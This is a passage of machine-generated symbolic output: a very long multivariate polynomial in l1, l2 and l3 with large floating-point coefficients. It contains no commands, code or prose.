1.90553269647309e+22*l1*l2**13*l3**4 + 5.15226933842882e+21*l1*l2**13*l3**3 - 6.79110078499028e+16*l1*l2**13*l3**2 + 2.09681313081854e+18*l1*l2**13*l3 + 3.38537190709897e+16*l1*l2**13 + 2.2073917709801e+34*l1*l2**12*l3**15 - 1.24475652513483e+33*l1*l2**12*l3**14 - 4.285530791702e+32*l1*l2**12*l3**13 - 2.7844060201728e+31*l1*l2**12*l3**12 + 3.67484345842044e+30*l1*l2**12*l3**11 + 6.61343770198766e+29*l1*l2**12*l3**10 - 1.46964139417533e+28*l1*l2**12*l3**9 - 4.74693277720576e+27*l1*l2**12*l3**8 + 2.09554816079517e+25*l1*l2**12*l3**7 + 1.39301449312905e+25*l1*l2**12*l3**6 + 1.16910545324638e+22*l1*l2**12*l3**5 - 1.47675656490139e+22*l1*l2**12*l3**4 - 3.0607613244704e+19*l1*l2**12*l3**3 - 1.45635535803023e+18*l1*l2**12*l3**2 - 1.94559304883198e+16*l1*l2**12*l3 + 1.07969371068442e+16*l1*l2**12 - 1.65702120758457e+34*l1*l2**11*l3**16 + 3.30735098588513e+33*l1*l2**11*l3**15 + 3.81844819215757e+32*l1*l2**11*l3**14 - 2.10158093833341e+31*l1*l2**11*l3**13 - 4.02172064397789e+30*l1*l2**11*l3**12 - 2.44654113133421e+29*l1*l2**11*l3**11 + 2.13962492141293e+28*l1*l2**11*l3**10 + 3.57113332070403e+27*l1*l2**11*l3**9 - 5.25799231078325e+25*l1*l2**11*l3**8 - 1.57612417358227e+25*l1*l2**11*l3**7 + 3.75464463429556e+22*l1*l2**11*l3**6 + 2.69209505708023e+22*l1*l2**11*l3**5 + 1.85444509395168e+19*l1*l2**11*l3**4 - 1.13547281977911e+19*l1*l2**11*l3**3 + 6.55662602016971e+16*l1*l2**11*l3**2 - 1.30083741106197e+16*l1*l2**11*l3 - 105656466651053.0*l1*l2**11 + 1.03081326780529e+34*l1*l2**10*l3**17 - 4.05396729869053e+33*l1*l2**10*l3**16 - 2.80945898803335e+32*l1*l2**10*l3**15 + 5.45392938924899e+31*l1*l2**10*l3**14 + 3.55660988035402e+30*l1*l2**10*l3**13 - 1.93711054371437e+29*l1*l2**10*l3**12 - 2.37549481265351e+28*l1*l2**10*l3**11 - 1.21414063414674e+27*l1*l2**10*l3**10 + 8.09205073538838e+25*l1*l2**10*l3**9 + 1.17926947736505e+25*l1*l2**10*l3**8 - 1.16667917133562e+23*l1*l2**10*l3**7 - 3.12144503939018e+22*l1*l2**10*l3**6 + 1.48286072946211e+19*l1*l2**10*l3**5 + 2.23894350177141e+19*l1*l2**10*l3**4 + 4.46855729322784e+16*l1*l2**10*l3**3 + 2.86536972636656e+16*l1*l2**10*l3**2 + 6778571738983.5*l1*l2**10*l3 - 29886114956988.8*l1*l2**10 - 5.15928581539916e+33*l1*l2**9*l3**18 + 3.63908555867267e+33*l1*l2**9*l3**17 + 1.68780435228588e+32*l1*l2**9*l3**16 - 6.47414105697156e+31*l1*l2**9*l3**15 - 2.55403685952053e+30*l1*l2**9*l3**14 + 4.81992248555141e+29*l1*l2**9*l3**13 + 2.08745259549674e+28*l1*l2**9*l3**12 - 1.26558519128196e+27*l1*l2**9*l3**11 - 9.19763640102285e+25*l1*l2**9*l3**10 - 3.18486299495606e+24*l1*l2**9*l3**9 + 2.00165549060606e+23*l1*l2**9*l3**8 + 2.22167683184597e+22*l1*l2**9*l3**7 - 1.59669404657202e+20*l1*l2**9*l3**6 - 3.17123175456696e+19*l1*l2**9*l3**5 + 5.57555245889794e+16*l1*l2**9*l3**4 - 6.07494077509157e+15*l1*l2**9*l3**3 - 155737878057397.0*l1*l2**9*l3**2 + 23895042443315.4*l1*l2**9*l3 + 96656320934.3063*l1*l2**9 + 1.92676415035463e+33*l1*l2**8*l3**19 - 2.61182597690838e+33*l1*l2**8*l3**18 - 8.01612998560212e+31*l1*l2**8*l3**17 + 5.54896466022948e+31*l1*l2**8*l3**16 + 1.47017170795331e+30*l1*l2**8*l3**15 - 5.48694978133746e+29*l1*l2**8*l3**14 - 1.45785007246402e+28*l1*l2**8*l3**13 + 2.80193188533733e+27*l1*l2**8*l3**12 + 8.00746107046719e+25*l1*l2**8*l3**11 - 5.91918837521325e+24*l1*l2**8*l3**10 - 2.31243170320518e+23*l1*l2**8*l3**9 - 2.17092653006094e+19*l1*l2**8*l3**8 + 2.70679683554814e+20*l1*l2**8*l3**7 + 1.02689225436835e+19*l1*l2**8*l3**6 + 7.45890814834328e+15*l1*l2**8*l3**5 + 2.11438502304185e+16*l1*l2**8*l3**4 - 202295355460913.0*l1*l2**8*l3**3 - 62956465911919.5*l1*l2**8*l3**2 + 91569146148.2417*l1*l2**8*l3 + 20603057883.3652*l1*l2**8 - 4.04342839852519e+32*l1*l2**7*l3**20 + 1.53829073972895e+33*l1*l2**7*l3**19 + 2.77053134740361e+31*l1*l2**7*l3**18 - 3.73716042852615e+31*l1*l2**7*l3**17 - 6.53940173229135e+29*l1*l2**7*l3**16 + 4.43362032690497e+29*l1*l2**7*l3**15 + 7.97362244584883e+27*l1*l2**7*l3**14 - 2.9977862064967e+27*l1*l2**7*l3**13 - 5.41576415155946e+25*l1*l2**7*l3**12 + 1.09803335608511e+25*l1*l2**7*l3**11 + 2.02668179352713e+23*l1*l2**7*l3**10 - 2.13862482452955e+22*l1*l2**7*l3**9 - 3.5951177783888e+20*l1*l2**7*l3**8 + 2.027794065869e+19*l1*l2**7*l3**7 + 2.38061410489238e+17*l1*l2**7*l3**6 - 7.71264507508605e+15*l1*l2**7*l3**5 - 116289822091794.0*l1*l2**7*l3**4 + 221592356529.737*l1*l2**7*l3**3 + 91569146148.3283*l1*l2**7*l3**2 - 0.0108333333333333*l1*l2**7*l3 + 184047167.196191*l1*l2**7 - 7.31281955624508e+31*l1*l2**6*l3**21 - 7.45982555301927e+32*l1*l2**6*l3**20 - 5.06533756320803e+30*l1*l2**6*l3**19 + 2.02013812604013e+31*l1*l2**6*l3**18 + 2.04413085565359e+29*l1*l2**6*l3**17 - 2.74999072005565e+29*l1*l2**6*l3**16 - 3.24847028307434e+27*l1*l2**6*l3**15 + 2.24978553355329e+27*l1*l2**6*l3**14 + 2.74628423626918e+25*l1*l2**6*l3**13 - 1.08174764560133e+25*l1*l2**6*l3**12 - 1.28194073197024e+23*l1*l2**6*l3**11 + 3.20745226323859e+22*l1*l2**6*l3**10 + 2.8473339060837e+20*l1*l2**6*l3**9 - 5.73334903456262e+19*l1*l2**6*l3**8 - 1.65830327011815e+17*l1*l2**6*l3**7 + 5.720168676616e+16*l1*l2**6*l3**6 - 224916241854283.0*l1*l2**6*l3**5 - 41534717322722.7*l1*l2**6*l3**4 + 289968962802.805*l1*l2**6*l3**3 + 20603057883.4167*l1*l2**6*l3**2 + 5.078125e-5*l1*l2**6*l3 + 96624762.7780195*l1*l2**6 + 1.14192451164062e+32*l1*l2**5*l3**22 + 2.94794915004258e+32*l1*l2**5*l3**21 - 1.05768179093139e+30*l1*l2**5*l3**20 - 8.72687221489122e+30*l1*l2**5*l3**19 - 3.07162276237164e+28*l1*l2**5*l3**18 + 1.32511733569495e+29*l1*l2**5*l3**17 + 8.67627555633239e+26*l1*l2**5*l3**16 - 1.25947047365137e+27*l1*l2**5*l3**15 - 9.8135883425604e+24*l1*l2**5*l3**14 + 7.32888433411822e+24*l1*l2**5*l3**13 + 5.87787482245463e+22*l1*l2**5*l3**12 - 2.77909930559705e+22*l1*l2**5*l3**11 - 1.78468005506555e+20*l1*l2**5*l3**10 + 6.324868515376e+19*l1*l2**5*l3**9 + 2.46335468462577e+17*l1*l2**5*l3**8 - 5.82903618065498e+16*l1*l2**5*l3**7 - 237196151610734.0*l1*l2**5*l3**6 - 18219046561516.6*l1*l2**5*l3**5 + 183138292296.44*l1*l2**5*l3**4 + 41206115766.6817*l1*l2**5*l3**3 - 276070750.794474*l1*l2**5*l3**2 - 165642450.476547*l1*l2**5*l3 - 2911683.69978424*l1*l2**5 - 5.80351255871815e+31*l1*l2**4*l3**23 - 9.2689874298793e+31*l1*l2**4*l3**22 + 1.22575327770598e+30*l1*l2**4*l3**21 + 2.9416578993085e+30*l1*l2**4*l3**20 - 7.65220308657666e+27*l1*l2**4*l3**19 - 4.85974159661008e+28*l1*l2**4*l3**18 - 7.00306381700995e+25*l1*l2**4*l3**17 + 5.24240621123341e+26*l1*l2**4*l3**16 + 1.79236247322616e+24*l1*l2**4*l3**15 - 3.57527852971251e+24*l1*l2**4*l3**14 - 1.39614777629033e+22*l1*l2**4*l3**13 + 1.69270977168547e+22*l1*l2**4*l3**12 + 4.50291099466524e+19*l1*l2**4*l3**11 - 5.15053885950467e+19*l1*l2**4*l3**10 - 2.50904860916821e+16*l1*l2**4*l3**9 + 7.73056943458504e+16*l1*l2**4*l3**8 - 103340518758355.0*l1*l2**4*l3**7 - 44515826993855.4*l1*l2**4*l3**6 + 183138292296.613*l1*l2**4*l3**5 + 920235835.981313*l1*l2**4*l3**3 + 207053063.095684*l1*l2**4*l3**2 - 3639604.62473058*l1*l2**4*l3 - 1637822.08112871*l1*l2**4 + 1.83236936489057e+31*l1*l2**3*l3**24 + 2.22246717348215e+31*l1*l2**3*l3**23 - 4.81665861721014e+29*l1*l2**3*l3**22 - 7.36156612750679e+29*l1*l2**3*l3**21 + 5.94548272069079e+27*l1*l2**3*l3**20 + 1.27852287065844e+28*l1*l2**3*l3**19 - 4.90589460725723e+25*l1*l2**3*l3**18 - 1.52961052409931e+26*l1*l2**3*l3**17 + 2.08979415388265e+23*l1*l2**3*l3**16 + 1.18461666638288e+24*l1*l2**3*l3**15 - 8.06455396519218e+20*l1*l2**3*l3**14 - 6.79179229549713e+21*l1*l2**3*l3**13 + 4.1766951030246e+18*l1*l2**3*l3**12 + 2.54725188797206e+19*l1*l2**3*l3**11 + 275546599684629.0*l1*l2**3*l3**10 - 4.19650236898362e+16*l1*l2**3*l3**9 - 132193690178506.0*l1*l2**3*l3**8 + 6786265918012.43*l1*l2**3*l3**7 + 289968962802.74*l1*l2**3*l3**6 + 41206115766.7304*l1*l2**3*l3**5 - 828212252.382836*l1*l2**3*l3**4 - 55214150.158832*l1*l2**3*l3**3 + 5823367.39956892*l1*l2**3*l3**2 + 1310257.66490298*l1*l2**3*l3 + 19107.9242798353*l1*l2**3 - 3.68997797723142e+30*l1*l2**2*l3**25 - 3.76392897226075e+30*l1*l2**2*l3**24 + 1.02708033015004e+29*l1*l2**2*l3**23 + 1.23583635354126e+29*l1*l2**2*l3**22 - 1.47467462911888e+27*l1*l2**2*l3**21 - 2.09020078171245e+27*l1*l2**2*l3**20 + 2.20482253083932e+25*l1*l2**2*l3**19 + 2.6807661521494e+25*l1*l2**2*l3**18 - 2.66112069022096e+23*l1*l2**2*l3**17 - 2.30529342847501e+23*l1*l2**2*l3**16 + 2.89857254535078e+21*l1*l2**2*l3**15 + 1.72712906023934e+21*l1*l2**2*l3**14 - 2.10040514182907e+19*l1*l2**2*l3**13 - 9.24676580680087e+18*l1*l2**2*l3**12 + 8.10777251571626e+16*l1*l2**2*l3**11 + 2.48240889157725e+16*l1*l2**2*l3**10 - 140557262800862.0*l1*l2**2*l3**9 - 36032994596330.6*l1*l2**2*l3**8 + 91569146148.3175*l1*l2**2*l3**7 + 20603057883.3449*l1*l2**2*l3**6 + 552141501.588625*l1*l2**2*l3**5 - 41410612.6191875*l1*l2**2*l3**4 - 9462972.02429922*l1*l2**2*l3**3 - 982693.248677237*l1*l2**2*l3**2 + 57323.7728395062*l1*l2**2*l3 + 12897.8488888889*l1*l2**2 + 4.13923658184646e+29*l1*l2*l3**26 + 3.86160485989334e+29*l1*l2*l3**25 - 9.35873267272708e+27*l1*l2*l3**24 - 1.07451589011108e+28*l1*l2*l3**23 + 8.27486298625504e+25*l1*l2*l3**22 + 1.16490573648685e+26*l1*l2*l3**21 - 2.87728784800852e+24*l1*l2*l3**20 - 1.13673471325123e+24*l1*l2*l3**19 + 6.30276273830536e+22*l1*l2*l3**18 + 6.2329119108971e+21*l1*l2*l3**17 - 9.71610458779826e+20*l1*l2*l3**16 - 1.1604073516703e+20*l1*l2*l3**15 + 7.97290026732246e+18*l1*l2*l3**14 + 1.15254558374684e+18*l1*l2*l3**13 - 2.89549473608414e+16*l1*l2*l3**12 - 3.59463837875438e+15*l1*l2*l3**11 + 19727875072336.2*l1*l2*l3**10 + 6146879639346.01*l1*l2*l3**9 + 91569146148.2379*l1*l2*l3**8 + 0.0040625*l1*l2*l3**7 - 92023583.598083*l1*l2*l3**6 + 82821225.2383171*l1*l2*l3**5 + 2911683.6997843*l1*l2*l3**4 - 655128.832451491*l1*l2*l3**3 - 28661.886419753*l1*l2*l3**2 - 1.47792889038101e-14*l1*l2 - 1.51435484701699e+28*l1*l3**27 - 1.59007258936784e+28*l1*l3**26 - 2.51793887439983e+26*l1*l3**25 + 5.53781060650536e+25*l1*l3**24 + 2.22586529156674e+25*l1*l3**23 + 1.57377026708005e+25*l1*l3**22 + 3.99304967376919e+22*l1*l3**21 - 3.54715729904823e+23*l1*l3**20 - 1.01622034954407e+22*l1*l3**19 + 4.6797261541316e+21*l1*l3**18 + 2.56785908573918e+20*l1*l3**17 - 1.95974126052777e+19*l1*l3**16 - 2.97340503850803e+18*l1*l3**15 - 9.32059128798025e+16*l1*l3**14 + 1.79522333300132e+16*l1*l3**13 + 1.22808672542497e+15*l1*l3**12 - 63015326381596.8*l1*l3**11 - 8554388262644.34*l1*l3**10 + 96656320934.2778*l1*l3**9 + 20603057883.3578*l1*l3**8 - 1.26953125e-5*l1*l3**7 - 27607075.0794327*l1*l3**6 - 727920.924946049*l1*l3**5 + 327564.416225743*l1*l3**4 + 19107.9242798353*l1*l3**3 + 5.04466394583384e-12*l1*l3**2 - 151.146666666667*l1*l3 - 22.672*l1 - 1.00956989801133e+28*l2**28 + 2.2715322705255e+29*l2**27*l3 - 3.78588711754249e+27*l2**27 - 2.17562313021442e+30*l2**26*l3**2 + 9.08612908210198e+28*l2**26*l3 + 2.23167341434005e+26*l2**26 + 1.29881167379158e+31*l2**25*l3**3 - 9.24513634103878e+29*l2**25*l3**2 - 8.81324380344727e+27*l2**25*l3 + 7.20153053120695e+25*l2**25 - 5.59655072962583e+31*l2**24*l3**4 + 5.86055325795579e+30*l2**24*l3**3 + 8.94629914421895e+28*l2**24*l3**2 - 3.35310867109797e+27*l2**24*l3 + 2.72594110739526e+24*l2**24 + 1.87350933823453e+32*l2**23*l3**5 - 2.68517829698819e+31*l2**23*l3**4 - 5.23347415512845e+29*l2**23*l3**3 + 3.68813432907783e+28*l2**23*l3**2 + 1.74047260393906e+26*l2**23*l3 + 1.55029501896947e+24*l2**23 - 5.08727319457401e+32*l2**22*l3**6 + 9.58859202034224e+31*l2**22*l3**5 + 2.14676243103386e+30*l2**22*l3**4 - 2.31276606358881e+29*l2**22*l3**3 - 1.9681702726721e+27*l2**22*l3**2 + 6.11146877813028e+25*l2**22*l3 - 1.0032523596717e+23*l2**22 + 1.15111664556201e+33*l2**21*l3**7 - 2.79078183224492e+32*l2**21*l3**6 - 6.74171496346344e+30*l2**21*l3**5 + 1.01569388380189e+30*l2**21*l3**4 + 1.12958497848276e+28*l2**21*l3**3 - 7.81438206491061e+26*l2**21*l3**2 - 2.87123850387217e+24*l2**21*l3 - 5.46734151857774e+22*l2**21 - 2.20856034813704e+33*l2**20*l3**8 + 6.81441508899486e+32*l2**20*l3**7 + 1.70035738953826e+31*l2**20*l3**6 - 3.42345322132681e+30*l2**20*l3**5 - 4.38317889931698e+28*l2**20*l3**4 + 4.86755393025982e+27*l2**20*l3**3 + 3.05958959319423e+25*l2**20*l3**2 - 8.99268235589536e+23*l2**20*l3 + 2.35680507407901e+21*l2**20 + 3.63164502852433e+33*l2**19*l3**9 - 1.42375099651997e+33*l2**19*l3**8 - 3.54417986577029e+31*l2**19*l3**7 + 9.31520517326371e+30*l2**19*l3**6 + 1.28086602580511e+29*l2**19*l3**5 - 2.0375665327102e+28*l2**19*l3**4 - 1.6135455973139e+26*l2**19*l3**3 + 1.15312351172102e+25*l2**19*l3**2 + 2.96341941797968e+22*l2**19*l3 + 1.15975624578853e+21*l2**19 - 5.14551528199029e+33*l2**18*l3**10 + 2.58094222415832e+33*l2**18*l3**9 + 6.21241099400372e+31*l2**18*l3**8 - 2.1112226040968e+31*l2**18*l3**7 - 2.97281469679973e+29*l2**18*l3**6 + 6.43158774640144e+28*l2**18*l3**5 + 5.70123693109003e+26*l2**18*l3**4 - 6.70830637646399e+25*l2**18*l3**3 - 3.04031353995489e+23*l2**18*l3**2 + 7.74126278400904e+21*l2**18*l3 - 2.58877731146049e+19*l2**18 + 6.2817054366102e+33*l2**17*l3**11 - 4.09994311184597e+33*l2**17*l3**10 - 9.24608246070814e+31*l2**17*l3**9 + 4.06878972587034e+31*l2**17*l3**8 + 5.64805463857197e+29*l2**17*l3**7 - 1.62148027720254e+29*l2**17*l3**6 - 1.51017644236238e+27*l2**17*l3**5 + 2.58101092539404e+26*l2**17*l3**4 + 1.475579364299e+24*l2**17*l3**3 - 1.06533361740797e+23*l2**17*l3**2 - 2.37961964785146e+20*l2**17*l3 - 1.21980582180189e+19*l2**17 - 6.56183079621141e+33*l2**16*l3**12 + 5.74772170701425e+33*l2**16*l3**11 + 1.17194307608658e+32*l2**16*l3**10 - 6.7626378163287e+31*l2**16*l3**9 - 8.93380048046124e+29*l2**16*l3**8 + 3.37764132250519e+29*l2**16*l3**7 + 3.15839914383489e+27*l2**16*l3**6 - 7.43807421344062e+26*l2**16*l3**5 - 4.71620235782208e+24*l2**16*l3**4 + 5.81097931537397e+23*l2**16*l3**3 + 2.04951201066216e+21*l2**16*l3**2 - 5.35303134712672e+19*l2**16*l3 + 2.89435966114528e+17*l2**16 + 5.75448279662123e+33*l2**15*l3**13 - 7.14550681814985e+33*l2**15*l3**12 - 1.2592859341235e+32*l2**15*l3**11 + 9.78830363229644e+31*l2**15*l3**10 + 1.1855488534464e+30*l2**15*l3**9 - 5.93935057087417e+29*l2**15*l3**8 - 5.36899360659219e+27*l2**15*l3**7 + 1.70235677463826e+27*l2**15*l3**6 + 1.12400101408047e+25*l2**15*l3**5 - 2.04059754216096e+24*l2**15*l3**4 - 8.82527427765777e+21*l2**15*l3**3 + 6.58832867950176e+20*l2**15*l3**2 + 9.14430510973431e+17*l2**15*l3 + 1.08897304118968e+17*l2**15 - 4.04020282270105e+33*l2**14*l3**14 + 7.90134328044131e+33*l2**14*l3**13 + 1.12852607473864e+32*l2**14*l3**12 - 1.2418561129123e+32*l2**14*l3**11 - 1.31841783030856e+30*l2**14*l3**10 + 8.94146634108867e+29*l2**14*l3**9 + 7.52403339544854e+27*l2**14*l3**8 - 3.20110574316003e+27*l2**14*l3**7 - 2.09818107835999e+25*l2**14*l3**6 + 5.31897683763671e+24*l2**14*l3**5 + 2.48416385732807e+22*l2**14*l3**4 - 3.21019833577002e+21*l2**14*l3**3 - 7.33091115846775e+18*l2**14*l3**2 + 1.37993169718117e+17*l2**14*l3 - 2.94094700641135e+15*l2**14 + 1.95330069512386e+33*l2**13*l3**15 - 7.78259438793505e+33*l2**13*l3**14 - 8.08534666752381e+31*l2**13*l3**13 + 1.38661713698801e+32*l2**13*l3**12 + 1.21288019697104e+30*l2**13*l3**11 - 1.16305165566805e+30*l2**13*l3**10 - 8.72609180220649e+27*l2**13*l3**9 + 5.04831046896024e+27*l2**13*l3**8 + 3.15725964653863e+25*l2**13*l3**7 - 1.09235507030944e+25*l2**13*l3**6 - 5.24820201581225e+22*l2**13*l3**5 + 9.94762684058788e+21*l2**13*l3**4 + 2.97572029567185e+19*l2**13*l3**3 - 2.01435875343622e+18*l2**13*l3**2 + 1.17304123867687e+15*l2**13*l3 - 921974667013770.0*l2**13 - 1.21718794753737e+32*l2**12*l3**16 + 6.8278989045527e+33*l2**12*l3**15 + 4.06796947515196e+31*l2**12*l3**14 - 1.36519862914053e+32*l2**12*l3**13 - 8.89971928178623e+29*l2**12*l3**12 + 1.31439343213508e+30*l2**12*l3**11 + 8.30384938006026e+27*l2**12*l3**10 - 6.76456703547525e+27*l2**12*l3**9 - 3.86777599085638e+25*l2**12*l3**8 + 1.82965734584195e+25*l2**12*l3**7 + 8.63066271919376e+22*l2**12*l3**6 - 2.29103166557257e+22*l2**12*l3**5 - 7.37017734355483e+19*l2**12*l3**4 + 9.2143397175672e+18*l2**12*l3**3 + 6.06564240720749e+15*l2**12*l3**2 + 1.18873356433482e+15*l2**12*l3 + 10853921906672.0*l2**12 - 1.02863057768579e+33*l2**11*l3**17 - 5.32763361503234e+33*l2**11*l3**16 - 5.32534170601314e+30*l2**11*l3**15 + 1.18518154596569e+32*l2**11*l3**14 + 4.67283065612432e+29*l2**11*l3**13 - 1.29400558937396e+30*l2**11*l3**12 - 6.30060554892603e+27*l2**11*l3**11 + 7.7603671104999e+27*l2**11*l3**10 + 3.85424083932876e+25*l2**11*l3**9 - 2.54747049706514e+25*l2**11*l3**8 - 1.13952464457727e+23*l2**11*l3**7 + 4.13338082163177e+22*l2**11*l3**6 + 1.40102916586409e+20*l2**11*l3**5 - 2.48043371032539e+19*l2**11*l3**4 - 4.75140215420597e+16*l2**11*l3**3 - 628214330697441.0*l2**11*l3**2 - 4100997431191.59*l2**11*l3 + 3073439819674.34*l2**11 + 1.42103020564483e+33*l2**10*l3**18 + 3.68576100376743e+33*l2**10*l3**17 - 1.6508569858984e+31*l2**10*l3**16 - 9.05492662969835e+31*l2**10*l3**15 - 9.27047064685706e+28*l2**10*l3**14 + 1.10982865672962e+30*l2**10*l3**13 + 3.50513926971911e+27*l2**10*l3**12 - 7.64999068921383e+27*l2**10*l3**11 - 3.06050659010777e+25*l2**10*l3**10 + 2.98254511003906e+25*l2**10*l3**9 + 1.20856528272785e+23*l2**10*l3**8 - 6.04939199979419e+22*l2**10*l3**7 - 2.03669387597944e+20*l2**10*l3**6 + 5.00916546236163e+19*l2**10*l3**5 + 1.07412532882038e+17*l2**10*l3**4 - 7.24777987533464e+15*l2**10*l3**3 + 6093789803944.96*l2**10*l3**2 - 3921723059427.38*l2**10*l3 - 10174349572.0425*l2**10 - 1.26577854672865e+33*l2**9*l3**19 - 2.24981642201928e+33*l2**9*l3**18 + 2.35629094511411e+31*l2**9*l3**17 + 6.06396295962219e+31*l2**9*l3**16 - 1.35555637302166e+29*l2**9*l3**15 - 8.27162772560808e+29*l2**9*l3**14 - 9.78682114977138e+26*l2**9*l3**13 + 6.48045767361835e+27*l2**9*l3**12 + 1.8301265849852e+25*l2**9*l3**11 - 2.95069648008949e+25*l2**9*l3**10 - 1.02569867267147e+23*l2**9*l3**9 + 7.28403039576199e+22*l2**9*l3**8 + 2.39289321251191e+20*l2**9*l3**7 - 7.82007047817486e+19*l2**9*l3**6 - 1.99791924172391e+17*l2**9*l3**5 + 1.96381848821095e+16*l2**9*l3**4 + 48624646840369.0*l2**9*l3**3 + 7661094075476.84*l2**9*l3**2 - 10174349572.0208*l2**9*l3 - 2289228653.70807*l2**9 + 8.74317818774755e+32*l2**8*l3**20 + 1.20316704079378e+33*l2**8*l3**19 - 2.04270973908306e+31*l2**8*l3**18 - 3.53674301746054e+31*l2**8*l3**17 + 2.0639653454597e+29*l2**8*l3**16 + 5.32877328745401e+29*l2**8*l3**15 - 5.68575216740126e+26*l2**8*l3**14 - 4.70200391906942e+27*l2**8*l3**13 - 6.68762797725978e+24*l2**8*l3**12 + 2.46801701439334e+25*l2**8*l3**11 + 6.68786030277964e+22*l2**8*l3**10 - 7.28378918170309e+22*l2**8*l3**9 - 2.20471468221933e+20*l2**8*l3**8 + 9.90767743560077e+19*l2**8*l3**7 + 2.54469731751776e+17*l2**8*l3**6 - 3.95775028338786e+16*l2**8*l3**5 - 62161272507557.3*l2**8*l3**4 - 1997793589128.78*l2**8*l3**3 + 0.01625*l2**8*l3 - 69017687.6985527*l2**8 - 4.91019463446282e+32*l2**7*l3**21 - 5.58181353303961e+32*l2**7*l3**20 + 1.33865887513479e+31*l2**7*l3**19 + 1.77950580934503e+31*l2**7*l3**18 - 1.74013179171235e+29*l2**7*l3**17 - 2.94148791415857e+29*l2**7*l3**16 + 1.06099282742869e+27*l2**7*l3**15 + 2.90098696850372e+27*l2**7*l3**14 - 6.25474235543049e+23*l2**7*l3**13 - 1.73684745593599e+25*l2**7*l3**12 - 3.04518862170354e+22*l2**7*l3**11 + 6.04089382781542e+22*l2**7*l3**10 + 1.60652601188005e+20*l2**7*l3**9 - 1.01611516938344e+20*l2**7*l3**8 - 2.73349947667765e+17*l2**7*l3**7 + 5.40554446243529e+16*l2**7*l3**6 + 127969585882587.0*l2**7*l3**5 + 3940189089160.78*l2**7*l3**4 - 30523048715.9867*l2**7*l3**3 - 0.0216666666666667*l2**7*l3**2 + 184047167.196191*l2**7*l3 - 27607075.0794255*l2**7 + 2.26703968447935e+32*l2**6*l3**22 + 2.21583429925222e+32*l2**6*l3**21 - 6.97180739383862e+30*l2**6*l3**20 - 7.61930462708175e+30*l2**6*l3**19 + 1.07166067362341e+29*l2**6*l3**18 + 1.37296506583327e+29*l2**6*l3**17 - 8.87729811337886e+26*l2**6*l3**16 - 1.50377962087196e+27*l2**6*l3**15 + 3.20080509448519e+24*l2**6*l3**14 + 1.01843691055025e+25*l2**6*l3**13 + 5.4698189900193e+21*l2**6*l3**12 - 4.13579173254059e+22*l2**6*l3**11 - 8.39957814543636e+19*l2**6*l3**10 + 8.5401567657115e+19*l2**6*l3**9 + 2.08054066617124e+17*l2**6*l3**8 - 6.22271141623759e+16*l2**6*l3**7 - 108711055732046.0*l2**6*l3**6 + 2790678739725.17*l2**6*l3**5 - 30523048716.16*l2**6*l3**4 - 6867685961.08833*l2**6*l3**3 - 322082542.5935*l2**6*l3**2 + 96624762.7780195*l2**6*l3 + 1698482.1582075*l2**6 - 8.55055225120699e+31*l2**5*l3**23 - 7.38316133888904e+31*l2**5*l3**22 + 2.90648061014716e+30*l2**5*l3**21 + 2.72213499886909e+30*l2**5*l3**20 - 5.08664181238859e+28*l2**5*l3**19 - 5.31272651705254e+28*l2**5*l3**18 + 5.14292925211492e+26*l2**5*l3**17 + 6.42634262430194e+26*l2**5*l3**16 - 2.79862563931015e+24*l2**5*l3**15 - 4.88822135479522e+24*l2**5*l3**14 + 4.74626944923135e+21*l2**5*l3**13 + 2.29948747507005e+22*l2**5*l3**12 + 2.71518757728883e+19*l2**5*l3**11 - 5.75658091096447e+19*l2**5*l3**10 - 1.26105443983108e+17*l2**5*l3**9 + 5.39566308476022e+16*l2**5*l3**8 + 127300192305673.0*l2**5*l3**7 + 245829020512.549*l2**5*l3**6 + 0.0433333333333333*l2**5*l3**5 - 0.065*l2**5*l3**4 + 276070750.794313*l2**5*l3**3 - 207053063.095684*l2**5*l3**2 - 2911683.69978437*l2**5*l3 + 655128.832451507*l2**5 + 2.58096544426598e+31*l2**4*l3**24 + 2.00803452714454e+31*l2**4*l3**23 - 9.55130235616819e+29*l2**4*l3**22 - 7.88206328269235e+29*l2**4*l3**21 + 1.86120873487868e+28*l2**4*l3**20 + 1.65386179904594e+28*l2**4*l3**19 - 2.20393651468128e+26*l2**4*l3**18 - 2.19847760780842e+26*l2**4*l3**17 + 1.54078078281025e+24*l2**4*l3**16 + 1.86775902024591e+24*l2**4*l3**15 - 5.52940355174729e+21*l2**4*l3**14 - 1.01462670361813e+22*l2**4*l3**13 + 2.07239533358408e+18*l2**4*l3**12 + 3.08485849221156e+19*l2**4*l3**11 + 3.9851485520438e+16*l2**4*l3**10 - 3.85654276204304e+16*l2**4*l3**9 - 61491878930609.9*l2**4*l3**8 + 6183811698759.31*l2**4*l3**7 - 30523048716.1031*l2**4*l3**6 + 0.0216666666666667*l2**4*l3**5 - 115029479.497613*l2**4*l3**4 + 276070750.794313*l2**4*l3**3 + 3639604.62473049*l2**4*l3**2 - 1637822.08112873*l2**4*l3 - 23884.9053497942*l2**4 - 6.00189304367738e+30*l2**3*l3**25 - 4.27275220085847e+30*l2**3*l3**24 + 2.38289833723965e+29*l2**3*l3**23 + 1.76771905719437e+29*l2**3*l3**22 - 5.08128884152279e+27*l2**3*l3**21 - 3.94698503342109e+27*l2**3*l3**20 + 6.91045357852832e+25*l2**3*l3**19 + 5.73528941962944e+25*l2**3*l3**18 - 5.86977913217567e+23*l2**3*l3**17 - 5.40978296710407e+23*l2**3*l3**16 + 3.03229862246318e+21*l2**3*l3**15 + 3.38406146001588e+21*l2**3*l3**14 - 7.32077590407829e+18*l2**3*l3**13 - 1.24055715473486e+19*l2**3*l3**12 - 2.62396962730852e+15*l2**3*l3**11 + 1.96226734171539e+16*l2**3*l3**10 + 39099253182229.8*l2**3*l3**9 - 3940189089132.25*l2**3*l3**8 - 30523048716.0896*l2**3*l3**7 - 6867685961.13167*l2**3*l3**6 - 92023583.598156*l2**3*l3**5 - 262267213.254668*l2**3*l3**4 - 970561.233261414*l2**3*l3**3 + 2620515.329806*l2**3*l3**2 + 19107.9242798354*l2**3*l3 - 8598.56592592592*l2**3 + 1.00452204852128e+30*l2**2*l3**26 + 6.63287422993446e+29*l2**2*l3**25 - 4.19630657663918e+28*l2**2*l3**24 - 2.84304066309756e+28*l2**2*l3**23 + 9.60960469207655e+26*l2**2*l3**22 + 6.63388375332177e+26*l2**2*l3**21 - 1.49569748632188e+25*l2**2*l3**20 - 1.04666496900198e+25*l2**2*l3**19 + 1.5299414041611e+23*l2**2*l3**18 + 1.09027307822277e+23*l2**2*l3**17 - 1.07969770469313e+21*l2**2*l3**16 - 7.91954229352461e+20*l2**2*l3**15 + 4.77098607155207e+18*l2**2*l3**14 + 3.57411388068045e+18*l2**2*l3**13 - 1.03273588899684e+16*l2**2*l3**12 